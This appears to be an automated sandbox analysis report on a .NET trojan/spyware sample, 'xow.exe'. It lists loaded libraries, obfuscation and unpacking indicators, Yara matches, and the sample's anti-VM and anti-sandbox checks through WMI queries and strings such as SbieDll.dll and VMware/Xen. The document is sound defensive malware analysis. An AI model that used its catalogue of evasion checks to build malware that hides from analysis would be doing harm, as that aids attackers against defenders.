Source: 0.2.xow.exe.64f0000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.xow.exe.64f0000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.xow.exe.64f0000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.xow.exe.64f0000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@9/1

Source: C:\Users\user\Desktop\xow.exe

Code function: 1_2_00399D10 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_00399D10

Source: C:\Users\user\Desktop\xow.exe

Mutant created: NULL

Source: xow.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: xow.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\xow.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: xow.exe	Virustotal: Detection: 32%
Source: xow.exe	ReversingLabs: Detection: 57%

Source: xow.exe	String found in binary or memory: --help
Source: xow.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\xow.exe

File read: C:\Users\user\Desktop\xow.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\xow.exe "C:\Users\user\Desktop\xow.exe"
Source: C:\Users\user\Desktop\xow.exe	Process created: C:\Users\user\Desktop\xow.exe "C:\Users\user\Desktop\xow.exe"
Source: C:\Users\user\Desktop\xow.exe	Process created: C:\Users\user\Desktop\xow.exe "C:\Users\user\Desktop\xow.exe"	Jump to behavior

Source: C:\Users\user\Desktop\xow.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\xow.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\xow.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: xow.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: xow.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: xow.exe

Static file information: File size 1450496 > 1048576

Source: xow.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x161800

Source: xow.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: xow.exe, 00000000.00000002.1728368665.0000000003D3D000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734839973.00000000064F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: xow.exe, 00000000.00000002.1728368665.0000000003D3D000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734839973.00000000064F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, beqJPMuTha87cOwuRYs.cs

.Net Code: Type.GetTypeFromHandle(aVe8sKOk84aF88RLRsM.TItIGpJacZ(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(aVe8sKOk84aF88RLRsM.TItIGpJacZ(16777255)),Type.GetTypeFromHandle(aVe8sKOk84aF88RLRsM.TItIGpJacZ(16777287))})

.NET source code contains potential unpacker

Source: xow.exe, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])
Source: xow.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.xow.exe.6380000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.xow.exe.6380000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.xow.exe.6380000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.xow.exe.6380000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.xow.exe.6380000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.xow.exe.64f0000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.xow.exe.64f0000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.xow.exe.64f0000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.xow.exe.6300000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.xow.exe.6300000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734036576.0000000006300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xow.exe PID: 7348, type: MEMORYSTR

Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062204EB push ecx; ret	0_2_062204EC
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062235AC push es; ret	0_2_062235D4
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06228972 push es; iretd	0_2_062289C4
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E6E70 push ebp; retn 0005h	0_2_062E6E72
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E6E51 push ebp; retn 0005h	0_2_062E6E52
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E6EE1 push edi; retn 0005h	0_2_062E6EE2
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E67A8 push eax; retn 0005h	0_2_062E67AA
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E44C0 push esp; retn 0005h	0_2_062E44C1
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E6A00 push edx; retn 0005h	0_2_062E6A02
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062EF24A push 8B03D930h; retf	0_2_062EF24F
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E683F push eax; retn 0005h	0_2_062E6842
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E6871 push ecx; retn 0005h	0_2_062E6872
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E10C9 push ss; retn 0005h	0_2_062E10CA
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E1111 push ss; retn 0005h	0_2_062E1112
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E695F push ecx; retn 0005h	0_2_062E6962
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F5A29 push es; ret	0_2_062F5A34
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F3627 push es; retf	0_2_062F3628
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F5AA2 push es; ret	0_2_062F5AA4
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F773B push es; retf 2F70h	0_2_062F775C
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062FB42D push FFFFFFE9h; retf	0_2_062FB441
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F8C9A push es; iretd	0_2_062F8CA4
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F5D6D push es; ret	0_2_062F5D70
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F59DD push es; ret	0_2_062F59E0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_063E0445 push es; ret	0_2_063E044D
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_065752E3 push esp; ret	0_2_065752E4
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657637D push es; retf	0_2_065763E4
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06576B25 pushfd ; ret	0_2_06576B26
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06576F93 pushfd ; ret	0_2_06576F94
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657CBBC push ECA1FABBh; ret	0_2_0657CBC7
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06575BAE push eax; ret	0_2_06575BAF
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_065797AE pushfd ; ret	0_2_065797AF

Source: xow.exe

Static PE information: section name: .text entropy: 7.858242567087758

Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, Xoe0bmO6eH34y5BAeGj.cs	High entropy of concatenated method names: 'J3eHsPbmYt', 'S7yHzHXoIJ', 'eBXlX3DAAw', 'fr8lgvGbdy', 'F6mlDXX3Li', 'NxLlEfQ7QM', 'kOYl9B4MPb', 'n2Ecl09rbs', 'MDFlmpP4Q5', 'q9nlJrcTMt'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, fxRsk0JQH8rCryI7UBD.cs	High entropy of concatenated method names: 'JmWJ8VhGqF', 'zGjJYY48VB', 'egBJ72aZjq', 'TUsJ6hrKom', 'MZkJs3B5Ec', 'SnNJz9M27V', 'HJSVXAfZ5A', 'CNdVgHBOa5', 'Of1VDbmI4L', 'wafVEeoV27'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, i0nD9NjKF6abKEWehWn.cs	High entropy of concatenated method names: 'QGfjIX8Doc', 'sYUjYeFOYx', 'VRYj2ECsLH', 'hFNj7kAGIk', 'be5jnDhsB2', 'ewdj6rM0tI', 'nlrjsjX1ea', 'LEVjz7KcUO', 'b74uX5W02m', 'BVjugYi515'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, beqJPMuTha87cOwuRYs.cs	High entropy of concatenated method names: 'gPTLQ3QJVhnD8dYhZwO', 'rRGyXFQVMVDbxeGyagT', 'paQOURxWOf', 'vh0ry9Sq2v', 'B1pOyRbMi8', 'MxwONILbJg', 'WKDOra8MCb', 'FkBOa6uI2r', 'Xm9Ib8nI9k', 'RNUueXAerl'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, KkvJE8Oq2l3Z99hKUYJ.cs	High entropy of concatenated method names: 'Xo6OKh7qaB', 'HCjOL89FwU', 'cvJOQTxDWb', 'BvJOZLZTkk', 'RaZO8ycjGy', 'fcYOIpxirJ', 'JGXOYLDNTO', 'EMNO2fBwus', 'AQAO7Rq7Km', 'MqVOne4UTR'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, l1ZFxvG20U50TtBXGGb.cs	High entropy of concatenated method names: 'IV2jrHLawY', 'pBRjaBE220', 'qy6j5n7ObR', 'Igb5soLRuwU5tqwDUfQ', 'OZ0T8ULwlNfRekVUfay', 'RoiGn6QCkU', 'fK2G68trrJ', 'HALGsVjdfo', 'RVJGzpeKqB', 'qsyjXP2x9a'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, mCiNYSgGZUqW6wDP3hW.cs	High entropy of concatenated method names: 'GGZguoL8Ni', 'HPjgOhMYhu', 'Rk2gyADIE8', 'IMjgrsbxxs', 'aDJg5XAWIs', 'b6Bgl3IxF6', 'ylrgByK6A8', 'qe6gCL0Frm', 'yuigRpdyQ4', 'yt1gvuf9QD'

Source: C:\Users\user\Desktop\xow.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: xow.exe PID: 7348, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\xow.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\xow.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\xow.exe	Memory allocated: 12E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Memory allocated: 2C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Memory allocated: 4C50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\xow.exe TID: 7408

Thread sleep time: -210000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\xow.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: xow.exe, 00000000.00000002.1731319915.0000000005410000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: aGmvurilpfckExtensionAttributeSystem.Runtime.CompilerServicesSystem.Core.ctorVoidSystemmscorlibCompilationRelaxationsAttributeInt32BooleanRuntimeCompatibilityAttributeDebuggableAttributeSystem.DiagnosticsDebuggingModesAssemblyTitleAttributeSystem.ReflectionStringAssemblyDescriptionAttributeAssemblyConfigurationAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeComVisibleAttributeSystem.Runtime.InteropServicesGuidAttributeAssemblyFileVersionAttributeTargetFrameworkAttributeSystem.Runtime.VersioningSuppressIldasmAttribute8923f847-36dc-4bb8-8b1c-0e24483c8018Gmvurilpfck.dll<Module>EmbeddedAttributeMicrosoft.CodeAnalysisAttributeRefSafetyRulesAttributeUIgoumumZmYEqbhjJEL1jwDcFvVWIPjoogLLObjectYqDfgNA9e13hcRI5UrG8kn2bBKCZWLLtva77nY2rVokIZNjWPi9cgiFqgmt33GaPIXgbKnAQEcBwXbMEwvDjBw3QlJValueTypehvqsZwe5g7CVlPkhjvt5k2iWdymuQhOJKhGeRe2i4QoLAgrwn0gBBOkpPdsSLVUt7aERlYeZqtP289gV5KveBongMNVXsEqh7g0sLVBO4OJC9amCiNYSgGZUqW6wDP3hWBcCxa7gjE98mv0JZQ0esFgsI4DCrLggAruhvq5MulticastDelegatep3Qhe6DpnOO18NZtaQVffO89yDROpkLIpUBuknajiJNcDwENLfyIHT0R1Fp7wWHDvhcbE1TCWqqbs7dcEaDkCcFDGeGVfv5DInKn9D3W2CRhp6Cnn0O36xE9DMbPZjxRjZoqjsaosNkDWLvalHEddpxGzwmlDmDT2kr92ykkUOknSkD5vDqkKBoZlgOtSUleDGwPDel9HavXWaLjVW9Yp5iD1BCbpLEpun0HPWFwqTD4JoebEiE0DUSl9hOKCDPESphpC7fMLDbJV4rGDi94AIR7TauCKy7Usf7DdC9ad3IJfd1ZlbfVxDDt3fgKPOx05edUbBUw5DxTJajUsxiGb7a4cNkrDSY2d1JhSklUiims58WDoRXib8TXsX24h39paNDfaP3qQIppFDfTlubLvDKheMfCQ4MDPmHo106wDLsA6nU77d6HbX5PUyIDQYH4Th4K2kaEjh1LaJDZALoYWN9EaqVkjDvG9D8hScR9kBKk9hUCKAhIDIp8wCik1HHL8L4cByVDYYw5v09q9NjLzRY1c0D2YKUKMA2gBfxxHxGhDD797UpEEeaPq7K1niarDneTJ0u91DAObV99W97D6aEA2J1aq84KNM4LNiDsQB40280lRDorSfStZDzOimVbki5c8EsO1PJkEXggQR7vsYKlRVsGwejEghu4H2jaSWk8jsKkiiEDMH21YL90S13KHJpluEEON4oJc45XGYhGfsJeE9wc0PNv6cfg3ResourcesGmvurilpfck.PropertiesdgDfUkE0r2MFoLodvIDwhsXbMEbunh1jlWEljQNryJIQEHcYboeH8I7TXIyWjSWElTpnABTOEiPHYS8LJoEsfjkI4XkLXNURV8fSUEzvyyYdTwf6NiQEdVZv92TRLseZd2W6lR4NjRv97D2e8eKZhVG1ydn0ylmjUj8W7UM7xuZbCLsV3muNepvBTANT8Ans6JKvmwHJBrGJO3wuJbJPLD4mvuD4M0qkppk0JmXBRFm4AgyKOwZ6PT0Mvk6ExmP2Yh78d3iJmeq655Ysmnrg6SpuRBNlPlb65rfm6e41MlHILrl2O7afPDJDlL6j2PsVhFNi4j30MJE5LblO6TqBGSD2tqueJ9BaJZl3BeYZhXAiYkeJmrR86RrWG6BJvd0DwKJ0fv1Y6nWcBacAyums8JbtMqG3YPkpXWhQxDLJJGi5pTkC8Qc92VaIZPwJjyAQv26dtCmEC8rHM0JNdmbbvUFjsOsoICHrUJrCKMhwqyO5eCe2xl7bJ5v4STKMabScfgQES10JHNacwJiOrhu5ODJMn7JhM0RFoD9kOVhs1dSeNJC0lLLpn8pBbooE25dNJR8s8HaxrHqe1PBuReAJwCSAiU6ZQfcTsJXOjQJkVFdXE5iLPmOfp7WAaJ3cm50VnmlYeOEnumaNxWW4JTULn67wm3aK6WAkoyGJqhscPGK0O7yPfFBBRLJPKJQXQOulSKfY5vEtJJi434SgYxy1hrz0p5XZJSOXoSNXp3Z5twEI6IGJoPvxQJVSnlQdfxRsk0JQH8rCryI7UBDdhJedVJZij2URi5gXMWkn5IvNVJTLZGEcQNd5VmrZwftVVNilBRpjqQJssdsGssV0xm2VNbLSwf0NiXiZnVOH0n0k4N8qG2XIOIPqVc63640vp18JEj8Jg6vVy3uMVKghUJyIaUr7x7VN6AUrHosD1LiVLSbC9VroooHMDQFvfYVmpYCHVaods0TJSXlpKn8OGB0V